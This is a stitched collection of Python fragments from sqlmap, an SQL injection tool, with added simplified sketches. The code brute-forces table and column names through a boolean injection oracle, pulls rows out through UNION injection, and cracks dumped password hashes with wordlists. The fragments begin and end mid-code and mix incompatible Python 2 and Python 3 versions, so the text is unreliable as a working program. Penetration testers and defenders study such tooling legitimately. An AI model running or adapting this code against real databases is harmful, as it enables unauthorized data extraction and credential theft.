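        if check("EXISTS(SELECT 1 FROM %s)" % table):
            found.append(table)
    return found

# Example with a fake oracle that only knows the table "users":
# print(brute_tables(lambda e: "FROM users)" in e, ["users", "admins"]))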
    threadData.shared.deeper = set()
    threadData.shared.unprocessed = set([target])

    logger.info("starting crawler")

    for i in xrange(conf.crawlDepth):
        if i > 0 and conf.threads == 1:
            singleTimeWarnMessage("running in a single-thread mode. This could take a while.")

        threadData.shared.count = 0
        threadData.shared.length = len(threadData.shared.unprocessed)
        numThreads = min(conf.threads, len(threadData.shared.unprocessed))

        logger.info("searching for links with depth %d" % (i + 1))
        runThreads(numThreads, crawlThread)
        clearConsoleLine(True)

        if threadData.shared.deeper:
            threadData.shared.unprocessed = set(threadData.shared.deeper)
        else:
            break

except KeyboardInterrupt:
    warnMsg = "user aborted during crawling. sqlmap "
    warnMsg += "will use partial list"
    logger.warn(warnMsg)

finally:
    clearConsoleLine(True)

    if not threadData.shared.value:
        warnMsg = "no usable links found (with GET parameters)"
def vulnTest(): """ Runs the testing against 'vulnserver' """ retVal = True count, length = 0, 6 address, port = "127.0.0.10", random.randint(1025, 65535) def _thread(): vulnserver.init(quiet=True) vulnserver.run(address=address, port=port) thread = threading.Thread(target=_thread) thread.daemon = True thread.start() for options, checks in ( ("--flush-session", ("CloudFlare", )), ("--flush-session --parse-errors --eval=\"id2=2\" --referer=\"localhost\" --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e\"", (": syntax error", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "back-end DBMS: SQLite", "3 columns")), ("--banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("--all --tamper=between,randomcase", ("5 entries", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), ("-z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT 987654321\"", ( "length of query output", ": '987654321'", )), ("--technique=T --fresh-queries --sql-query=\"SELECT 1234\"", (": '1234'", )), ): cmd = "%s %s -u http://%s:%d/?id=1 --batch %s" % ( sys.executable, os.path.abspath( os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), address, port, options) output = shellExec(cmd) if not all(check in output for check in checks): dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % clearColors(output)) retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round( 100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def columnExists(columnFile, regex=None): if not conf.tbl: errMsg = "missing table parameter" raise sqlmapMissingMandatoryOptionException, errMsg columns = getFileItems(columnFile, unique=True) columns = filterListValue(columns, regex) if conf.db and not conf.db.endswith(METADB_SUFFIX): table = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', conf.tbl) else: table = conf.tbl table = safeSQLIdentificatorNaming(table) retVal = [] infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) count = [0] length = len(columns) threads = [] collock = threading.Lock() iolock = threading.Lock() kb.threadContinue = True kb.bruteMode = True def columnExistsThread(): while count[0] < length and kb.threadContinue: collock.acquire() column = safeSQLIdentificatorNaming(columns[count[0]]) count[0] += 1 collock.release() result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s)", (column, table))) iolock.acquire() if result: retVal.append(column) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), column) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (count[0], length, round(100.0*count[0]/length), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) iolock.release() if conf.threads > 1: infoMsg = "starting %d threads" % conf.threads logger.info(infoMsg) else: message = "please enter number of threads? [Enter for %d (current)] " % conf.threads choice = readInput(message, default=str(conf.threads)) if choice and choice.isdigit(): conf.threads = int(choice) if conf.threads == 1: warnMsg = "running in a single-thread mode. This could take a while." logger.warn(warnMsg) # Start the threads for numThread in range(conf.threads): thread = threading.Thread(target=columnExistsThread, name=str(numThread)) thread.start() threads.append(thread) # And wait for them to all finish try: alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True thread.join(5) except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True print logger.debug("waiting for threads to finish") warnMsg = "user aborted during common column existence check. " warnMsg += "sqlmap will display some columns only" logger.warn(warnMsg) try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise sqlmapThreadException, "user aborted" finally: kb.bruteMode = False kb.threadContinue = True kb.threadException = False clearConsoleLine(True) dataToStdout("\n") if not retVal: warnMsg = "no column found" logger.warn(warnMsg) else: columns = {} for column in retVal: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = 'numeric' else: columns[column] = 'non-numeric' dataToSessionFile("[%s][%s][%s][COLUMN_EXISTS][%s|%s %s]\n" % (conf.url, kb.injection.place,\ safeFormatString(conf.parameters[kb.injection.place]), safeFormatString(table),\ safeFormatString(column), safeFormatString(columns[column]))) kb.data.cachedColumns[conf.db] = {conf.tbl: columns} return kb.data.cachedColumns
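# --- Schematic restatement (simplified assumption) of the type inference at the end
# --- of columnExists() above: through the same boolean oracle, a column is labeled
# --- numeric when comparing ROUND(column) with itself still yields a TRUE answer.
def classify_columns(check, table, columns):
    # check(expression) -> bool is the injected boolean oracle (assumed to be given)
    types = {}
    for column in columns:
        expr = "EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))" % (column, table, column, column)
        types[column] = "numeric" if check(expr) else "non-numeric"
    return types

# print(classify_columns(lambda e: "ROUND(id)" in e, "users", ["id", "name"]))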
def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): if IS_WIN: coloramainit() count = 0 rotator = 0 hashes = set([item[0][1] for item in attack_info]) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if not attack_info: break if not isinstance(word, basestring): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password=word, uppercase=False) count += 1 if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item if hash_ == current: retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % ( time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif ( proc_id == 0 or getattr(proc_count, "value", 0) == 1 ) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % ( word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not hasattr(conf, "api"): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s (%s). " % ( repr(word), e) warnMsg += "Please report by e-mail to '*****@*****.**'" logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1
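# --- Self-contained sketch of the variant-A attack loop above: hash every candidate
# --- word once and check whether the digest matches any of the collected (unsalted)
# --- hashes. hashlib.md5 stands in here for the per-format __functions__ entry.
import hashlib

def crack_unsalted(hashes, wordlist, suffixes=("",)):
    cracked = {}
    remaining = set(h.lower() for h in hashes)
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            digest = hashlib.md5(candidate.encode("utf8")).hexdigest()
            if digest in remaining:
                cracked[digest] = candidate
                remaining.discard(digest)
        if not remaining:
            break
    return cracked

# target = hashlib.md5(b"testpass").hexdigest()
# print(crack_unsalted({target}, ["foo", "testpass", "bar"]))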
def tableExists(tableFile, regex=None): tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS), unique=True) retVal = [] infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) infoMsg = "adding words used on web page to the check list" logger.info(infoMsg) pageWords = getPageTextWordsSet(kb.originalPage) for word in pageWords: word = word.lower() if len(word) > 2 and not word[0].isdigit() and word not in tables: tables.append(word) tables = filterListValue(tables, regex) count = [0] length = len(tables) threads = [] items = set() tbllock = threading.Lock() iolock = threading.Lock() kb.threadContinue = True kb.bruteMode = True def tableExistsThread(): while count[0] < length and kb.threadContinue: tbllock.acquire() table = safeSQLIdentificatorNaming(tables[count[0]]) count[0] += 1 tbllock.release() if conf.db and not conf.db.endswith(METADB_SUFFIX): fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName))) iolock.acquire() if result and table.lower() not in items: retVal.append(table) items.add(table.lower()) dataToSessionFile("[%s][%s][%s][TABLE_EXISTS][%s]\n" % (conf.url,\ kb.injection.place, safeFormatString(conf.parameters[kb.injection.place]),\ safeFormatString(fullTableName))) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (count[0], length, round(100.0*count[0]/length), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) iolock.release() if conf.threads > 1: infoMsg = "starting %d threads" % conf.threads logger.info(infoMsg) else: message = "please enter number of threads? [Enter for %d (current)] " % conf.threads choice = readInput(message, default=str(conf.threads)) if choice and choice.isdigit(): conf.threads = int(choice) if conf.threads == 1: warnMsg = "running in a single-thread mode. This could take a while." logger.warn(warnMsg) # Start the threads for numThread in range(conf.threads): thread = threading.Thread(target=tableExistsThread, name=str(numThread)) thread.start() threads.append(thread) # And wait for them to all finish try: alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True thread.join(5) except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True print logger.debug("waiting for threads to finish") warnMsg = "user aborted during common table existence check. " warnMsg += "sqlmap will display some tables only" logger.warn(warnMsg) try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise sqlmapThreadException, "user aborted" finally: kb.bruteMode = False kb.threadContinue = True kb.threadException = False clearConsoleLine(True) dataToStdout("\n") if not retVal: warnMsg = "no table found" logger.warn(warnMsg) else: for item in retVal: if not kb.data.cachedTables.has_key(conf.db): kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) return kb.data.cachedTables
def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [""] hash_regexes = [] results = [] resumes = [] user_hash = [] processException = False foundHash = False for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[ regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue foundHash = True hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): hash_ = hash_.lower() if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE, ): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {'salt': hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC, ): item = [(user, hash_), {'salt': hash_[0:2]}] elif hash_regex in (HASH.WORDPRESS, ): if ITOA64.index(hash_[3]) < 32: item = [(user, hash_), { 'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12] }] else: warnMsg = "invalid hash '%s'" % hash_ logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % ( resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[ 0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default="1") try: if choice == "2": message = "what's the custom dictionary's location?\n" dictPaths = [readInput(message)] logger.info("using custom dictionary") elif choice == "3": message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") dictPaths = filter(None, dictPaths) for dictPath in dictPaths: checkFile(dictPath) kb.wordlists = dictPaths except Exception, ex: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) 
[y/N] " test = readInput(message, default="N") if test[0] in ("y", "Y"): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[ hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count( ) singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() count = _multiprocessing.Value( 'i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process( target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.daemon = True p.start() while count.value > 0: time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = filter( lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count( ) singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value( 'i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process( target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.daemon = True p.start() while count.value > 0: time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) found = found_.value except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase 
(Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get( block=False) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine()
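# --- Illustrative sketch (not sqlmap code): the worker/queue cracking pattern used above,
# reduced to a self-contained stdlib example. Every name here (crack_worker, TARGET_HASHES,
# WORDS) is hypothetical; a shared Value counter tells the parent when all workers are done
# and matches travel back through a multiprocessing Queue, mirroring retVal/count above.
import hashlib
import multiprocessing
import time

TARGET_HASHES = {hashlib.md5(b"secret").hexdigest(): "admin"}   # hash -> user (made up)
WORDS = ["password", "123456", "secret", "letmein"]

def crack_worker(proc_id, proc_count, results, remaining):
    try:
        # each process takes every proc_count-th candidate, starting at its own offset
        for word in WORDS[proc_id::proc_count]:
            digest = hashlib.md5(word.encode("utf8")).hexdigest()
            if digest in TARGET_HASHES:
                results.put((TARGET_HASHES[digest], digest, word))
    finally:
        with remaining.get_lock():
            remaining.value -= 1        # signal completion, like the proc_count handling above

if __name__ == "__main__":
    cpu = multiprocessing.cpu_count()
    results = multiprocessing.Queue()
    remaining = multiprocessing.Value('i', cpu)
    workers = [multiprocessing.Process(target=crack_worker, args=(i, cpu, results, remaining)) for i in range(cpu)]
    for p in workers:
        p.daemon = True
        p.start()
    while remaining.value > 0:          # same polling loop the code above uses
        time.sleep(0.5)
    for p in workers:
        p.join()
    while not results.empty():
        print("cracked %s:%s -> '%s'" % results.get(block=False))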
def unionUse(expression, unpack=True, dump=False): """ This function tests for an union SQL injection on the target URL then call its subsidiary function to effectively perform an union SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields( origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None if expressionFieldsList and len( expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I)\ or kb.forcePartialUnion: expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition( expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace( expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. 
" warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: if all( map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): items = parseUnionPage(output) with kb.locks.value: if threadData.shared.showEta: threadData.shared.progress.progress( time.time() - valueStart, threadData.shared.counter) # in case that we requested N columns and we get M!=N then we have to filter a bit if isListLike( items) and len(items) > 1 and len( expressionFieldsList) > 1: items = [ item for item in items if isListLike(item) and len(item) == len(expressionFieldsList) ] index = None for index in xrange( len(threadData.shared.buffered)): if threadData.shared.buffered[index][ 0] >= num: break threadData.shared.buffered.insert( index or 0, (num, items)) while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[ 0][0]: threadData.shared.lastFlushed += 1 _ = threadData.shared.buffered[0][1] if not isNoneValue(_): threadData.shared.value.extend( arrayizeValue(_)) del threadData.shared.buffered[0] else: with kb.locks.value: index = None if threadData.shared.showEta: threadData.shared.progress.progress( time.time() - valueStart, threadData.shared.counter) for index in xrange( len(threadData.shared.buffered)): if threadData.shared.buffered[index][ 0] >= num: break threadData.shared.buffered.insert( index or 0, (num, None)) items = output.replace( kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) if conf.verbose == 1 and not ( threadData.resumed and kb.suppressResumeInfo ) and not threadData.shared.showEta: status = "[%s] [INFO] %s: %s" % ( time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join( "\"%s\"" % _ for _ in flattenValue( arrayizeValue(items))))) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\r\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. 
sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % ( kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api): if IS_WIN: coloramainit() count = 0 rotator = 0 wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if found.value: break count += 1 if isinstance(word, six.binary_type): word = getUnicode(word) elif not isinstance(word, six.string_types): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) found.value = True elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if user and not user.startswith(DUMMY_USER_PREFIX): status += " (user: %s)" % user if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception as ex: warnMsg = "there was a problem while hashing entry: %s ('%s'). " % (repr(word), getSafeExString(ex)) warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1
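# --- Illustrative sketch (not sqlmap code): the __functions__ dispatch the cracking loops rely
# on above, i.e. a dictionary mapping a recognized hash format to its hashing routine so the
# loop itself stays format-agnostic. The helpers below (md5_generic_passwd, mysql_passwd) are
# simplified stand-ins written for this example, not sqlmap's own implementations.
import hashlib

def md5_generic_passwd(password, uppercase=False):
    digest = hashlib.md5(password.encode("utf8")).hexdigest()
    return digest.upper() if uppercase else digest

def mysql_passwd(password, uppercase=True):
    # MySQL 4.1+ style: '*' followed by hex of SHA1(SHA1(password))
    digest = hashlib.sha1(hashlib.sha1(password.encode("utf8")).digest()).hexdigest()
    retVal = "*%s" % digest
    return retVal.upper() if uppercase else retVal

__functions__ = {"md5_generic": md5_generic_passwd, "mysql": mysql_passwd}

candidate = "secret"
for name, func in __functions__.items():
    print(name, func(password=candidate, uppercase=False))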
def columnExists(columnFile, regex=None): if not conf.tbl: errMsg = "missing table parameter" raise SqlmapMissingMandatoryOptionException, errMsg result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise SqlmapDataException, errMsg infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(_addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db: table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.outputs = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.outputs.append(column) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), column) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (threadData.shared.count, threadData.shared.limit, round(100.0*threadData.shared.count/threadData.shared.limit), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.outputs: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.outputs: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = 'numeric' else: columns[column] = 'non-numeric' kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): if _ not in 